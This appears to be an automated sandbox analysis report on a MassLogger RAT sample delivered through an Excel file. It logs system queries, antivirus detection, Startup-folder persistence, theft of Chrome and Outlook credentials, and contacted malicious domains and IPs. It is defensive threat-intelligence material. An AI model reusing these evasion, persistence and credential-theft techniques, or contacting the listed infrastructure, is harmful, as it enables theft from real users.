Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\ProgramData\a.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839119724.0000000000C8A000.00000004.00000001.sdmp Binary or memory string: \??\C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: a.exe, 00000001.00000002.709230972.0000000000BC7000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: a.exe, 00000001.00000002.709683488.00000000027FE000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.774809994.0000000002CFC000.00000004.00000001.sdmp, a.exe, 00000011.00000002.844042385.0000000002A53000.00000004.00000001.sdmp Binary or memory string: e.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: a.exe, 00000001.00000002.709683488.00000000027FE000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.774809994.0000000002CFC000.00000004.00000001.sdmp, a.exe, 00000011.00000002.844042385.0000000002A53000.00000004.00000001.sdmp Binary or memory string: e(C:\Program Files\AVG\Antivirus\AVGUI.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\ProgramData\a.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information:

Yara detected MassLogger RAT
Source: Yara match File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5508, type: MEMORY

Remote Access Functionality:

Yara detected MassLogger RAT
Source: Yara match File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE
Behavior Graph (ID: 356267, Sample: LIQUIDACION INTERBANCARIA 0..., Startdate: 22/02/2021, Architecture: WINDOWS, Score: 100). Process chain shown in the graph: EXCEL.EXE starts a.exe; a.exe starts cmd.exe, which starts wscript.exe, powershell.exe, conhost.exe and timeout.exe; powershell.exe starts a further a.exe.

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
45.148.121.68 unknown Netherlands 64425 SKB-ENTERPRISENL false
54.225.220.115 unknown United States 14618 AMAZON-AESUS false
185.199.108.133 unknown Netherlands 54113 FASTLYUS false
208.91.199.223 unknown United States 394695 PUBLIC-DOMAIN-REGISTRYUS false
185.162.146.6 unknown Turkey 60721 BURSABILTR false

Contacted Domains

Name IP Active
pastex.pro 45.148.121.68 true
elb097307-934924932.us-east-1.elb.amazonaws.com 54.225.220.115 true
us2.smtp.mailhostbox.com 208.91.199.223 true
raw.githubusercontent.com 185.199.108.133 true
seyranikenger.com.tr 185.162.146.6 true
smtp.saleforceconsults.com unknown unknown
api.ipify.org unknown unknown
www.seyranikenger.com.tr unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
